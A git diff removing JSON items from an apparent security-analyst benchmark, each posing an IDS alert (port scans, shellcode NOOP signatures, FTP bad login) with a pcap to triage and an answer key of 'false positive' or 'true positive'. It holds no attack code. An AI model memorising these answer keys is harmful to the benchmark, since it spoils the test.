901c9e80a1a8fbb38763583972855c9a8d2d39db..0000000000000000000000000000000000000000 --- a/SIABench-main/Alert_Triaging_Dataset/Alert_Triaging_Dataset_CIC/alert_25.json +++ /dev/null @@ -1,47 +0,0 @@ -{ - "scenarios": [ - { - "metadata": { - "scenario_name": "monday_pri_3_7", - "alert_type": "False", - "alert_name": "false_alert_18" - } - }, - { - "sia_components": { - "scenario": "The soc team got an alert from the IDS. The alert is: 07/03-08:28:51.366471 [**] [122:23:1] \"(port_scan) UDP filtered portsweep\" [**] [Priority: 3] {UDP} 192.168.10.5:54077 -> 192.168.10.3:53", - "alert": "07/03-08:28:51.366471 [**] [122:23:1] \"(port_scan) UDP filtered portsweep\" [**] [Priority: 3] {UDP} 192.168.10.5:54077 -> 192.168.10.3:53", - "tools_available": [ - "tshark", - "python", - "md5sum", - "grep", - "strings", - "file", - "cut", - "unique", - "wc", - "cat", - "ls", - "sort", - "echo", - "head", - "tail", - "xxd", - "base64", - "cd", - "whois" - ], - "files_available": "capture.pcap", - "instructions": "\nYou are solving this problem in a kali linux terminal. With the mentioned tools, you can use any other tool as you want. If you need to install any other tool, you can do it by adding sudo at the beginning of the command.", - "directory": "(directory_of_the_file)", - "questions": [ - { - "question": "Analyze the provided PCAP file and determine if the generated alert is a false positive or true positive.", - "answer": "false positive" - } - ] - } - } - ] -} \ No newline at end of file diff --git a/SIABench-main/Alert_Triaging_Dataset/Alert_Triaging_Dataset_CIC/alert_26.json b/SIABench-main/Alert_Triaging_Dataset/Alert_Triaging_Dataset_CIC/alert_26.json deleted file mode 100644 index 57adeb435b04a1a14fa91d5762cc7052fa6049f4..0000000000000000000000000000000000000000 --- a/SIABench-main/Alert_Triaging_Dataset/Alert_Triaging_Dataset_CIC/alert_26.json +++ /dev/null @@ -1,47 +0,0 @@ -{ - "scenarios": [ - { - "metadata": { - "scenario_name": "monday_pri_4", - "alert_type": "False", - "alert_name": "false_alert_19" - } - }, - { - "sia_components": { - "scenario": "The soc team got an alert from the IDS. The alert is: 07/03-08:39:59.907940 [**] [1:1394:17] \"INDICATOR-SHELLCODE x86 inc ecx NOOP\" [**] [Classification: Executable code was detected] [Priority: 1] {TCP} 13.107.4.50:80 -> 192.168.10.15:49647", - "alert": "07/03-08:39:59.907940 [**] [1:1394:17] \"INDICATOR-SHELLCODE x86 inc ecx NOOP\" [**] [Classification: Executable code was detected] [Priority: 1] {TCP} 13.107.4.50:80 -> 192.168.10.15:49647", - "tools_available": [ - "tshark", - "python", - "md5sum", - "grep", - "strings", - "file", - "cut", - "unique", - "wc", - "cat", - "ls", - "sort", - "echo", - "head", - "tail", - "xxd", - "base64", - "cd", - "whois" - ], - "files_available": "capture.pcap", - "instructions": "\nYou are solving this problem in a kali linux terminal. With the mentioned tools, you can use any other tool as you want. If you need to install any other tool, you can do it by adding sudo at the beginning of the command.", - "directory": "(directory_of_the_file)", - "questions": [ - { - "question": "Analyze the provided PCAP file and determine if the generated alert is a false positive or true positive.", - "answer": "false positive" - } - ] - } - } - ] -} \ No newline at end of file diff --git a/SIABench-main/Alert_Triaging_Dataset/Alert_Triaging_Dataset_CIC/alert_27.json b/SIABench-main/Alert_Triaging_Dataset/Alert_Triaging_Dataset_CIC/alert_27.json deleted file mode 100644 index e6186af33f1effa5ebc030fa39a9ccf4acc3416d..0000000000000000000000000000000000000000 --- a/SIABench-main/Alert_Triaging_Dataset/Alert_Triaging_Dataset_CIC/alert_27.json +++ /dev/null @@ -1,47 +0,0 @@ -{ - "scenarios": [ - { - "metadata": { - "scenario_name": "monday_pri_5", - "alert_type": "False", - "alert_name": "false_alert_20" - } - }, - { - "sia_components": { - "scenario": "The soc team got an alert from the IDS. The alert is: 07/03-08:41:16.831986 [**] [1:648:18] \"INDICATOR-SHELLCODE x86 NOOP\" [**] [Classification: Executable code was detected] [Priority: 1] {TCP} 13.107.4.50:80 -> 192.168.10.15:49647", - "alert": "07/03-08:41:16.831986 [**] [1:648:18] \"INDICATOR-SHELLCODE x86 NOOP\" [**] [Classification: Executable code was detected] [Priority: 1] {TCP} 13.107.4.50:80 -> 192.168.10.15:49647", - "tools_available": [ - "tshark", - "python", - "md5sum", - "grep", - "strings", - "file", - "cut", - "unique", - "wc", - "cat", - "ls", - "sort", - "echo", - "head", - "tail", - "xxd", - "base64", - "cd", - "whois" - ], - "files_available": "capture.pcap", - "instructions": "\nYou are solving this problem in a kali linux terminal. With the mentioned tools, you can use any other tool as you want. If you need to install any other tool, you can do it by adding sudo at the beginning of the command.", - "directory": "(directory_of_the_file)", - "questions": [ - { - "question": "Analyze the provided PCAP file and determine if the generated alert is a false positive or true positive.", - "answer": "false positive" - } - ] - } - } - ] -} \ No newline at end of file diff --git a/SIABench-main/Alert_Triaging_Dataset/Alert_Triaging_Dataset_CIC/alert_28.json b/SIABench-main/Alert_Triaging_Dataset/Alert_Triaging_Dataset_CIC/alert_28.json deleted file mode 100644 index 3203cf7bbad4fa3c8759b4840ee51a2a23aede06..0000000000000000000000000000000000000000 --- a/SIABench-main/Alert_Triaging_Dataset/Alert_Triaging_Dataset_CIC/alert_28.json +++ /dev/null @@ -1,47 +0,0 @@ -{ - "scenarios": [ - { - "metadata": { - "scenario_name": "monday_pri_6", - "alert_type": "False", - "alert_name": "false_alert_21" - } - }, - { - "sia_components": { - "scenario": "The soc team got an alert from the IDS. The alert is: 07/03-09:18:02.399625 [**] [1:1394:17] \"INDICATOR-SHELLCODE x86 inc ecx NOOP\" [**] [Classification: Executable code was detected] [Priority: 1] {TCP} 104.27.145.213:80 -> 192.168.10.51:54506", - "alert": "07/03-09:18:02.399625 [**] [1:1394:17] \"INDICATOR-SHELLCODE x86 inc ecx NOOP\" [**] [Classification: Executable code was detected] [Priority: 1] {TCP} 104.27.145.213:80 -> 192.168.10.51:54506", - "tools_available": [ - "tshark", - "python", - "md5sum", - "grep", - "strings", - "file", - "cut", - "unique", - "wc", - "cat", - "ls", - "sort", - "echo", - "head", - "tail", - "xxd", - "base64", - "cd", - "whois" - ], - "files_available": "capture.pcap", - "instructions": "\nYou are solving this problem in a kali linux terminal. With the mentioned tools, you can use any other tool as you want. If you need to install any other tool, you can do it by adding sudo at the beginning of the command.", - "directory": "(directory_of_the_file)", - "questions": [ - { - "question": "Analyze the provided PCAP file and determine if the generated alert is a false positive or true positive.", - "answer": "false positive" - } - ] - } - } - ] -} \ No newline at end of file diff --git a/SIABench-main/Alert_Triaging_Dataset/Alert_Triaging_Dataset_CIC/alert_29.json b/SIABench-main/Alert_Triaging_Dataset/Alert_Triaging_Dataset_CIC/alert_29.json deleted file mode 100644 index fe6a4bf74090fbd2b13dd6c61e60684323c1a1ce..0000000000000000000000000000000000000000 --- a/SIABench-main/Alert_Triaging_Dataset/Alert_Triaging_Dataset_CIC/alert_29.json +++ /dev/null @@ -1,47 +0,0 @@ -{ - "scenarios": [ - { - "metadata": { - "scenario_name": "monday_pri_8", - "alert_type": "False", - "alert_name": "false_alert_22" - } - }, - { - "sia_components": { - "scenario": "The soc team got an alert from the IDS. The alert is: 07/03-13:45:33.806533 [**] [1:1394:17] \"INDICATOR-SHELLCODE x86 inc ecx NOOP\" [**] [Classification: Executable code was detected] [Priority: 1] {TCP} 104.24.24.85:80 -> 192.168.10.17:38619", - "alert": "07/03-13:45:33.806533 [**] [1:1394:17] \"INDICATOR-SHELLCODE x86 inc ecx NOOP\" [**] [Classification: Executable code was detected] [Priority: 1] {TCP} 104.24.24.85:80 -> 192.168.10.17:38619", - "tools_available": [ - "tshark", - "python", - "md5sum", - "grep", - "strings", - "file", - "cut", - "unique", - "wc", - "cat", - "ls", - "sort", - "echo", - "head", - "tail", - "xxd", - "base64", - "cd", - "whois" - ], - "files_available": "capture.pcap", - "instructions": "\nYou are solving this problem in a kali linux terminal. With the mentioned tools, you can use any other tool as you want. If you need to install any other tool, you can do it by adding sudo at the beginning of the command.", - "directory": "(directory_of_the_file)", - "questions": [ - { - "question": "Analyze the provided PCAP file and determine if the generated alert is a false positive or true positive.", - "answer": "false positive" - } - ] - } - } - ] -} \ No newline at end of file diff --git a/SIABench-main/Alert_Triaging_Dataset/Alert_Triaging_Dataset_CIC/alert_3.json b/SIABench-main/Alert_Triaging_Dataset/Alert_Triaging_Dataset_CIC/alert_3.json deleted file mode 100644 index b4b3bfc03455927731fca5232f0c83fce6a53835..0000000000000000000000000000000000000000 --- a/SIABench-main/Alert_Triaging_Dataset/Alert_Triaging_Dataset_CIC/alert_3.json +++ /dev/null @@ -1,47 +0,0 @@ -{ - "scenarios": [ - { - "metadata": { - "scenario_name": "if1", - "alert_type": "False", - "alert_name": "false_alert_23" - } - }, - { - "sia_components": { - "scenario": "The soc team got an alert from the IDS. The alert is: 07/07-08:04:51.819436 [**] [1:1201:13] \"INDICATOR-COMPROMISE 403 Forbidden\" [**] [Classification: Attempted Information Leak] [Priority: 2] {TCP} 23.15.4.9:80 -> 192.168.10.14:49536", - "alert": "07/07-08:04:51.819436 [**] [1:1201:13] \"INDICATOR-COMPROMISE 403 Forbidden\" [**] [Classification: Attempted Information Leak] [Priority: 2] {TCP} 23.15.4.9:80 -> 192.168.10.14:49536", - "tools_available": [ - "tshark", - "python", - "md5sum", - "grep", - "strings", - "file", - "cut", - "unique", - "wc", - "cat", - "ls", - "sort", - "echo", - "head", - "tail", - "xxd", - "base64", - "cd", - "whois" - ], - "files_available": "capture.pcap", - "instructions": "\nYou are solving this problem in a kali linux terminal. With the mentioned tools, you can use any other tool as you want. If you need to install any other tool, you can do it by adding sudo at the beginning of the command.", - "directory": "(directory_of_the_file)", - "questions": [ - { - "question": "Analyze the provided PCAP file and determine if the generated alert is a false positive or true positive.", - "answer": "false positive" - } - ] - } - } - ] -} \ No newline at end of file diff --git a/SIABench-main/Alert_Triaging_Dataset/Alert_Triaging_Dataset_CIC/alert_30.json b/SIABench-main/Alert_Triaging_Dataset/Alert_Triaging_Dataset_CIC/alert_30.json deleted file mode 100644 index f4698757f28b3c86fe151550e83af4c8ce0356b5..0000000000000000000000000000000000000000 --- a/SIABench-main/Alert_Triaging_Dataset/Alert_Triaging_Dataset_CIC/alert_30.json +++ /dev/null @@ -1,47 +0,0 @@ -{ - "scenarios": [ - { - "metadata": { - "scenario_name": "monday_pri_9", - "alert_type": "False", - "alert_name": "false_alert_24" - } - }, - { - "sia_components": { - "scenario": "The soc team got an alert from the IDS. The alert is: 07/03-14:04:29.757515 [**] [1:1390:17] \"INDICATOR-SHELLCODE x86 inc ebx NOOP\" [**] [Classification: Executable code was detected] [Priority: 1] {TCP} 52.84.143.247:80 -> 192.168.10.17:58791", - "alert": "07/03-14:04:29.757515 [**] [1:1390:17] \"INDICATOR-SHELLCODE x86 inc ebx NOOP\" [**] [Classification: Executable code was detected] [Priority: 1] {TCP} 52.84.143.247:80 -> 192.168.10.17:58791", - "tools_available": [ - "tshark", - "python", - "md5sum", - "grep", - "strings", - "file", - "cut", - "unique", - "wc", - "cat", - "ls", - "sort", - "echo", - "head", - "tail", - "xxd", - "base64", - "cd", - "whois" - ], - "files_available": "capture.pcap", - "instructions": "\nYou are solving this problem in a kali linux terminal. With the mentioned tools, you can use any other tool as you want. If you need to install any other tool, you can do it by adding sudo at the beginning of the command.", - "directory": "(directory_of_the_file)", - "questions": [ - { - "question": "Analyze the provided PCAP file and determine if the generated alert is a false positive or true positive.", - "answer": "false positive" - } - ] - } - } - ] -} \ No newline at end of file diff --git a/SIABench-main/Alert_Triaging_Dataset/Alert_Triaging_Dataset_CIC/alert_31.json b/SIABench-main/Alert_Triaging_Dataset/Alert_Triaging_Dataset_CIC/alert_31.json deleted file mode 100644 index fbabc38425a6bf4a72441d4c236f4dd434f5a001..0000000000000000000000000000000000000000 --- a/SIABench-main/Alert_Triaging_Dataset/Alert_Triaging_Dataset_CIC/alert_31.json +++ /dev/null @@ -1,47 +0,0 @@ -{ - "scenarios": [ - { - "metadata": { - "scenario_name": "f1", - "alert_type": "True", - "alert_name": "true_alert_1" - } - }, - { - "sia_components": { - "scenario": "The soc team got an alert from the IDS. The alert is: 07/04-09:20:01.417087 [**] [1:491:15] \"PROTOCOL-FTP Bad login\" [**] [Classification: Potentially Bad Traffic] [Priority: 2] {TCP} 192.168.10.50:21 -> 172.16.0.1:60100", - "alert": "07/04-09:20:01.417087 [**] [1:491:15] \"PROTOCOL-FTP Bad login\" [**] [Classification: Potentially Bad Traffic] [Priority: 2] {TCP} 192.168.10.50:21 -> 172.16.0.1:60100", - "tools_available": [ - "tshark", - "python", - "md5sum", - "grep", - "strings", - "file", - "cut", - "unique", - "wc", - "cat", - "ls", - "sort", - "echo", - "head", - "tail", - "xxd", - "base64", - "cd", - "whois" - ], - "files_available": "capture.pcap", - "instructions": "\nYou are solving this problem in a kali linux terminal. With the mentioned tools, you can use any other tool as you want. If you need to install any other tool, you can do it by adding sudo at the beginning of the command.", - "directory": "(directory_of_the_file)", - "questions": [ - { - "question": "Analyze the provided PCAP file and determine if the generated alert is a false positive or true positive.", - "answer": "true positive" - } - ] - } - } - ] -} \ No newline at end of file diff --git a/SIABench-main/Alert_Triaging_Dataset/Alert_Triaging_Dataset_CIC/alert_32.json b/SIABench-main/Alert_Triaging_Dataset/Alert_Triaging_Dataset_CIC/alert_32.json deleted file mode 100644 index ba1cb8875e7a558b0dbfebb95ea41df81289ee28..0000000000000000000000000000000000000000 --- a/SIABench-main/Alert_Triaging_Dataset/Alert_Triaging_Dataset_CIC/alert_32.json +++ /dev/null @@ -1,47 +0,0 @@ -{ - "scenarios": [ - { - "metadata": { - "scenario_name": "s1", - "alert_type": "True", - "alert_name": "true_alert_2" - } - }, - { - "sia_components": { - "scenario": "The soc team got an alert from the IDS. The alert is: 07/07-13:55:01.154623 [**] [122:1:1] '(port_scan) TCP portscan' [**] [Priority: 3] {TCP} 172.16.0.1:41140 -> 192.168.10.50:5900", - "alert": "07/07-13:55:01.154623 [**] [122:1:1] \"(port_scan) TCP portscan\" [**] [Priority: 3] {TCP} 172.16.0.1:41140 -> 192.168.10.50:5900", - "tools_available": [ - "tshark", - "python", - "md5sum", - "grep", - "strings", - "file", - "cut", - "unique", - "wc", - "cat", - "ls", - "sort", - "echo", - "head", - "tail", - "xxd", - "base64", - "cd", - "whois" - ], - "files_available": "capture.pcap", - "instructions": "\nYou are solving this problem in a kali linux terminal. With the mentioned tools, you can use any other tool as you want. If you need to install any other tool, you can do it by adding sudo at the beginning of the command.", - "directory": "(directory_of_the_file)", - "questions": [ - { - "question": "Analyze the provided PCAP file and determine if the generated alert is a false positive or true positive.", - "answer": "true positive" - } - ] - } - } - ] -} \ No newline at end of file diff --git a/SIABench-main/Alert_Triaging_Dataset/Alert_Triaging_Dataset_CIC/alert_33.json b/SIABench-main/Alert_Triaging_Dataset/Alert_Triaging_Dataset_CIC/alert_33.json deleted file mode 100644 index 6073adcf9e85d2c33a69dd0b3ff1cfb6bf5c77bf..0000000000000000000000000000000000000000 --- a/SIABench-main/Alert_Triaging_Dataset/Alert_Triaging_Dataset_CIC/alert_33.json +++ /dev/null @@ -1,47 +0,0 @@ -{ - "scenarios": [ - { - "metadata": { - "scenario_name": "s2", - "alert_type": "True", - "alert_name": "true_alert_3" - } - }, - { - "sia_components": { - "scenario": "The soc team got an alert from the IDS. The alert is: 07/07-14:08:01.734199 [**] [122:1:1] \"(port_scan) TCP portscan\" [**] [Priority: 3] {TCP} 172.16.0.1:43959 -> 192.168.10.50:587", - "alert": "07/07-14:08:01.734199 [**] [122:1:1] \"(port_scan) TCP portscan\" [**] [Priority: 3] {TCP} 172.16.0.1:43959 -> 192.168.10.50:587", - "tools_available": [ - "tshark", - "python", - "md5sum", - "grep", - "strings", - "file", - "cut", - "unique", - "wc", - "cat", - "ls", - "sort", - "echo", - "head", - "tail", - "xxd", - "base64", - "cd", - "whois" - ], - "files_available": "capture.pcap", - "instructions": "\nYou are solving this problem in a kali linux terminal. With the mentioned tools, you can use any other tool as you want. If you need to install any other tool, you can do it by adding sudo at the beginning of the command.", - "directory": "(directory_of_the_file)", - "questions": [ - { - "question": "Analyze the provided PCAP file and determine if the generated alert is a false positive or true positive.", - "answer": "true positive" - } - ] - } - } - ] -} \ No newline at end of file diff --git a/SIABench-main/Alert_Triaging_Dataset/Alert_Triaging_Dataset_CIC/alert_34.json b/SIABench-main/Alert_Triaging_Dataset/Alert_Triaging_Dataset_CIC/alert_34.json deleted file mode 100644 index dd52cf3a1e282bf7df7271f2c3ab0bbc281f1c48..0000000000000000000000000000000000000000 --- a/SIABench-main/Alert_Triaging_Dataset/Alert_Triaging_Dataset_CIC/alert_34.json +++ /dev/null @@ -1,47 +0,0 @@ -{ - "scenarios": [ - { - "metadata": { - "scenario_name": "s3", - "alert_type": "True", - "alert_name": "true_alert_4" - } - }, - { - "sia_components": { - "scenario": "The soc team got an alert from the IDS. The alert is: 07/07-14:22:02.313683 [**] [122:1:1] \"(port_scan) TCP portscan\" [**] [Priority: 3] {TCP} 172.16.0.1:35609 -> 192.168.10.50:135", - "alert": "07/07-14:22:02.313683 [**] [122:1:1] \"(port_scan) TCP portscan\" [**] [Priority: 3] {TCP} 172.16.0.1:35609 -> 192.168.10.50:135", - "tools_available": [ - "tshark", - "python", - "md5sum", - "grep", - "strings", - "file", - "cut", - "unique", - "wc", - "cat", - "ls", - "sort", - "echo", - "head", - "tail", - "xxd", - "base64", - "cd", - "whois" - ], - "files_available": "capture.pcap", - "instructions": "\nYou are solving this problem in a kali linux terminal. With the mentioned tools, you can use any other tool as you want. If you need to install any other tool, you can do it by adding sudo at the beginning of the command.", - "directory": "(directory_of_the_file)", - "questions": [ - { - "question": "Analyze the provided PCAP file and determine if the generated alert is a false positive or true positive.", - "answer": "true positive" - } - ] - } - } - ] -} \ No newline at end of file diff --git a/SIABench-main/Alert_Triaging_Dataset/Alert_Triaging_Dataset_CIC/alert_35.json b/SIABench-main/Alert_Triaging_Dataset/Alert_Triaging_Dataset_CIC/alert_35.json deleted file mode 100644 index ef3a1b8538f7bfb88deb5dc27d0d519222d83324..0000000000000000000000000000000000000000 --- a/SIABench-main/Alert_Triaging_Dataset/Alert_Triaging_Dataset_CIC/alert_35.json +++ /dev/null @@ -1,47 +0,0 @@ -{ - "scenarios": [ - { - "metadata": { - "scenario_name": "sh1", - "alert_type": "True", - "alert_name": "true_alert_5" - } - }, - { - "sia_components": { - "scenario": "The soc team got an alert from the IDS. The alert is: 07/04-14:07:21.893671 [**] [1:1325:14] \"INDICATOR-SHELLCODE ssh CRC32 overflow filler\" [**] [Classification: Executable code was detected] [Priority: 1] {TCP} 172.16.0.1:52054 -> 192.168.10.50:22", - "alert": "07/04-14:07:21.893671 [**] [1:1325:14] \"INDICATOR-SHELLCODE ssh CRC32 overflow filler\" [**] [Classification: Executable code was detected] [Priority: 1] {TCP} 172.16.0.1:52054 -> 192.168.10.50:22", - "tools_available": [ - "tshark", - "python", - "md5sum", - "grep", - "strings", - "file", - "cut", - "unique", - "wc", - "cat", - "ls", - "sort", - "echo", - "head", - "tail", - "xxd", - "base64", - "cd", - "whois" - ], - "files_available": "capture.pcap", - "instructions": "\nYou are solving this problem in a kali linux terminal. With the mentioned tools, you can use any other tool as you want. If you need to install any other tool, you can do it by adding sudo at the beginning of the command.", - "directory": "(directory_of_the_file)", - "questions": [ - { - "question": "Analyze the provided PCAP file and determine if the generated alert is a false positive or true positive.", - "answer": "true positive" - } - ] - } - } - ] -} \ No newline at end of file diff --git a/SIABench-main/Alert_Triaging_Dataset/Alert_Triaging_Dataset_CIC/alert_4.json b/SIABench-main/Alert_Triaging_Dataset/Alert_Triaging_Dataset_CIC/alert_4.json deleted file mode 100644 index ec086e2a31f3633362c06b3fdcf027e7ee7773a4..0000000000000000000000000000000000000000 --- a/SIABench-main/Alert_Triaging_Dataset/Alert_Triaging_Dataset_CIC/alert_4.json +++ /dev/null @@ -1,47 +0,0 @@ -{ - "scenarios": [ - { - "metadata": { - "scenario_name": "lg1", - "alert_type": "False", - "alert_name": "false_alert_25" - } - }, - { - "sia_components": { - "scenario": "The soc team got an alert from the IDS. The alert is: 07/03-09:10:05.894236 [**] [1:1675:8] \"SERVER-ORACLE misparsed login response\" [**] [Classification: An attempted login using a suspicious username was detected] [Priority: 2] {TCP} 195.88.55.95:80 -> 192.168.10.9:65480", - "alert": "07/03-09:10:05.894236 [**] [1:1675:8] \"SERVER-ORACLE misparsed login response\" [**] [Classification: An attempted login using a suspicious username was detected] [Priority: 2] {TCP} 195.88.55.95:80 -> 192.168.10.9:65480", - "tools_available": [ - "tshark", - "python", - "md5sum", - "grep", - "strings", - "file", - "cut", - "unique", - "wc", - "cat", - "ls", - "sort", - "echo", - "head", - "tail", - "xxd", - "base64", - "cd", - "whois" - ], - "files_available": "capture.pcap", - "instructions": "\nYou are solving this problem in a kali linux terminal. With the mentioned tools, you can use any other tool as you want. If you need to install any other tool, you can do it by adding sudo at the beginning of the command.", - "directory": "(directory_of_the_file)", - "questions": [ - { - "question": "Analyze the provided PCAP file and determine if the generated alert is a false positive or true positive.", - "answer": "false positive" - } - ] - } - } - ] -} \ No newline at end of file diff --git a/SIABench-main/Alert_Triaging_Dataset/Alert_Triaging_Dataset_CIC/alert_5.json b/SIABench-main/Alert_Triaging_Dataset/Alert_Triaging_Dataset_CIC/alert_5.json deleted file mode 100644 index 06c12534fe35d75f00817d4480a683621725a71b..0000000000000000000000000000000000000000 --- a/SIABench-main/Alert_Triaging_Dataset/Alert_Triaging_Dataset_CIC/alert_5.json +++ /dev/null @@ -1,47 +0,0 @@ -{ - "scenarios": [ - { - "metadata": { - "scenario_name": "fs1", - "alert_type": "False", - "alert_name": "false_alert_26" - } - }, - { - "sia_components": { - "scenario": "The soc team got an alert from the IDS. The alert is: 07/07-08:00:50.818009 [**] [122:1:1] \"(port_scan) TCP portscan\" [**] [Priority: 3] {TCP} 192.168.10.3:88 -> 192.168.10.5:49175", - "alert": "07/07-08:00:50.818009 [**] [122:1:1] \"(port_scan) TCP portscan\" [**] [Priority: 3] {TCP} 192.168.10.3:88 -> 192.168.10.5:49175", - "tools_available": [ - "tshark", - "python", - "md5sum", - "grep", - "strings", - "file", - "cut", - "unique", - "wc", - "cat", - "ls", - "sort", - "echo", - "head", - "tail", - "xxd", - "base64", - "cd", - "whois" - ], - "files_available": "capture.pcap", - "instructions": "\nYou are solving this problem in a kali linux terminal. With the mentioned tools, you can use any other tool as you want. If you need to install any other tool, you can do it by adding sudo at the beginning of the command.", - "directory": "(directory_of_the_file)", - "questions": [ - { - "question": "Analyze the provided PCAP file and determine if the generated alert is a false positive or true positive.", - "answer": "false positive" - } - ] - } - } - ] -} \ No newline at end of file diff --git a/SIABench-main/Alert_Triaging_Dataset/Alert_Triaging_Dataset_CIC/alert_6.json b/SIABench-main/Alert_Triaging_Dataset/Alert_Triaging_Dataset_CIC/alert_6.json deleted file mode 100644 index f9d2c7a1864ba3946667f9308a43037d70739a9a..0000000000000000000000000000000000000000 --- a/SIABench-main/Alert_Triaging_Dataset/Alert_Triaging_Dataset_CIC/alert_6.json +++ /dev/null @@ -1,47 +0,0 @@ -{ - "scenarios": [ - { - "metadata": { - "scenario_name": "monday_pri_1", - "alert_type": "False", - "alert_name": "false_alert_27" - } - }, - { - "sia_components": { - "scenario": "The soc team got an alert from the IDS. The alert is: 07/03-08:20:06.886845 [**] [1:1394:17] \"INDICATOR-SHELLCODE x86 inc ecx NOOP\" [**] [Classification: Executable code was detected] [Priority: 1] {TCP} 104.27.144.213:80 -> 192.168.10.16:37956", - "alert": "07/03-08:20:06.886845 [**] [1:1394:17] \"INDICATOR-SHELLCODE x86 inc ecx NOOP\" [**] [Classification: Executable code was detected] [Priority: 1] {TCP} 104.27.144.213:80 -> 192.168.10.16:37956", - "tools_available": [ - "tshark", - "python", - "md5sum", - "grep", - "strings", - "file", - "cut", - "unique", - "wc", - "cat", - "ls", - "sort", - "echo", - "head", - "tail", - "xxd", - "base64", - "cd", - "whois" - ], - "files_available": "capture.pcap", - "instructions": "\nYou are solving this problem in a kali linux terminal. With the mentioned tools, you can use any other tool as you want. If you need to install any other tool, you can do it by adding sudo at the beginning of the command.", - "directory": "(directory_of_the_file)", - "questions": [ - { - "question": "Analyze the provided PCAP file and determine if the generated alert is a false positive or true positive.", - "answer": "false positive" - } - ] - } - } - ] -} \ No newline at end of file diff --git a/SIABench-main/Alert_Triaging_Dataset/Alert_Triaging_Dataset_CIC/alert_7.json b/SIABench-main/Alert_Triaging_Dataset/Alert_Triaging_Dataset_CIC/alert_7.json deleted file mode 100644 index 75e2c5dd94b051f3b4b7dd27aee411d01c1be2e8..0000000000000000000000000000000000000000 --- a/SIABench-main/Alert_Triaging_Dataset/Alert_Triaging_Dataset_CIC/alert_7.json +++ /dev/null @@ -1,47 +0,0 @@ -{ - "scenarios": [ - { - "metadata": { - "scenario_name": "monday_pri_2", - "alert_type": "False", - "alert_name": "false_alert_28" - } - }, - { - "sia_components": { - "scenario": "The soc team got an alert from the IDS. The alert is: 07/03-08:34:00.503373 [**] [1:648:18] \"INDICATOR-SHELLCODE x86 NOOP\" [**] [Classification: Executable code was detected] [Priority: 1] {TCP} 13.107.4.50:80 -> 192.168.10.15:49647", - "alert": "07/03-08:34:00.503373 [**] [1:648:18] \"INDICATOR-SHELLCODE x86 NOOP\" [**] [Classification: Executable code was detected] [Priority: 1] {TCP} 13.107.4.50:80 -> 192.168.10.15:49647", - "tools_available": [ - "tshark", - "python", - "md5sum", - "grep", - "strings", - "file", - "cut", - "unique", - "wc", - "cat", - "ls", - "sort", - "echo", - "head", - "tail", - "xxd", - "base64", - "cd", - "whois" - ], - "files_available": "capture.pcap", - "instructions": "\nYou are solving this problem in a kali linux terminal. With the mentioned tools, you can use any other tool as you want. If you need to install any other tool, you can do it by adding sudo at the beginning of the command.", - "directory": "(directory_of_the_file)", - "questions": [ - { - "question": "Analyze the provided PCAP file and determine if the generated alert is a false positive or true positive.", - "answer": "false positive" - } - ] - } - } - ] -} \ No newline at end of file diff --git a/SIABench-main/Alert_Triaging_Dataset/Alert_Triaging_Dataset_CIC/alert_8.json b/SIABench-main/Alert_Triaging_Dataset/Alert_Triaging_Dataset_CIC/alert_8.json deleted file mode 100644 index 4ad3de86834d86cac29257797c7394ed31b4b944..0000000000000000000000000000000000000000 --- a/SIABench-main/Alert_Triaging_Dataset/Alert_Triaging_Dataset_CIC/alert_8.json +++ /dev/null @@ -1,47 +0,0 @@ -{ - "scenarios": [ - { - "metadata": { - "scenario_name": "monday_pri_2_1", - "alert_type": "False", - "alert_name": "false_alert_29" - } - }, - { - "sia_components": { - "scenario": "The soc team got an alert from the IDS. The alert is: 07/03-08:09:42.792575 [**] [1:1201:13] \"INDICATOR-COMPROMISE 403 Forbidden\" [**] [Classification: Attempted Information Leak] [Priority: 2] {TCP} 165.254.0.104:80 -> 192.168.10.14:49961", - "alert": "07/03-08:09:42.792575 [**] [1:1201:13] \"INDICATOR-COMPROMISE 403 Forbidden\" [**] [Classification: Attempted Information Leak] [Priority: 2] {TCP} 165.254.0.104:80 -> 192.168.10.14:49961", - "tools_available": [ - "tshark", - "python", - "md5sum", - "grep", - "strings", - "file", - "cut", - "unique", - "wc", - "cat", - "ls", - "sort", - "echo", - "head", - "tail", - "xxd", - "base64", - "cd", - "whois" - ], - "files_available": "capture.pcap", - "instructions": "\nYou are solving this problem in a kali linux terminal. With the mentioned tools, you can use any other tool as you want. If you need to install any other tool, you can do it by adding sudo at the beginning of the command.", - "directory": "(directory_of_the_file)", - "questions": [ - { - "question": "Analyze the provided PCAP file and determine if the generated alert is a false positive or true positive.", - "answer": "false positive" - } - ] - } - } - ] -} \ No newline at end of file diff --git a/SIABench-main/Alert_Triaging_Dataset/Alert_Triaging_Dataset_CIC/alert_9.json b/SIABench-main/Alert_Triaging_Dataset/Alert_Triaging_Dataset_CIC/alert_9.json deleted file mode 100644 index ea6ac30cbb82928f381a8cd6cf7c9286ea8fc584..0000000000000000000000000000000000000000 --- a/SIABench-main/Alert_Triaging_Dataset/Alert_Triaging_Dataset_CIC/alert_9.json +++ /dev/null @@ -1,47 +0,0 @@ -{ - "scenarios": [ - { - "metadata": { - "scenario_name": "monday_pri_2_10", - "alert_type": "False", - "alert_name": "false_alert_30" - } - }, - { - "sia_components": { - "scenario": "The soc team got an alert from the IDS. The alert is: 07/03-13:40:10.893145 [**] [1:853:17] \"SERVER-WEBAPP wrap access\" [**] [Classification: Attempted Information Leak] [Priority: 2] {TCP} 192.168.10.14:57473 -> 125.1.77.19:80", - "alert": "07/03-13:40:10.893145 [**] [1:853:17] \"SERVER-WEBAPP wrap access\" [**] [Classification: Attempted Information Leak] [Priority: 2] {TCP} 192.168.10.14:57473 -> 125.1.77.19:80", - "tools_available": [ - "tshark", - "python", - "md5sum", - "grep", - "strings", - "file", - "cut", - "unique", - "wc", - "cat", - "ls", - "sort", - "echo", - "head", - "tail", - "xxd", - "base64", - "cd", - "whois" - ], - "files_available": "capture.pcap", - "instructions": "\nYou are solving this problem in a kali linux terminal. With the mentioned tools, you can use any other tool as you want. If you need to install any other tool, you can do it by adding sudo at the beginning of the command.", - "directory": "(directory_of_the_file)", - "questions": [ - { - "question": "Analyze the provided PCAP file and determine if the generated alert is a false positive or true positive.", - "answer": "false positive" - } - ] - } - } - ] -} \ No newline at end of file diff --git a/SIABench-main/Alert_Triaging_Dataset/Alert_Triaging_Dataset_TII/FP/scenario_dp_235492.json b/SIABench-main/Alert_Triaging_Dataset/Alert_Triaging_Dataset_TII/FP/scenario_dp_235492.json deleted file mode 100644 index e007374864562dd9975b26980040b89887d1d9de..0000000000000000000000000000000000000000 --- a/SIABench-main/Alert_Triaging_Dataset/Alert_Triaging_Dataset_TII/FP/scenario_dp_235492.json 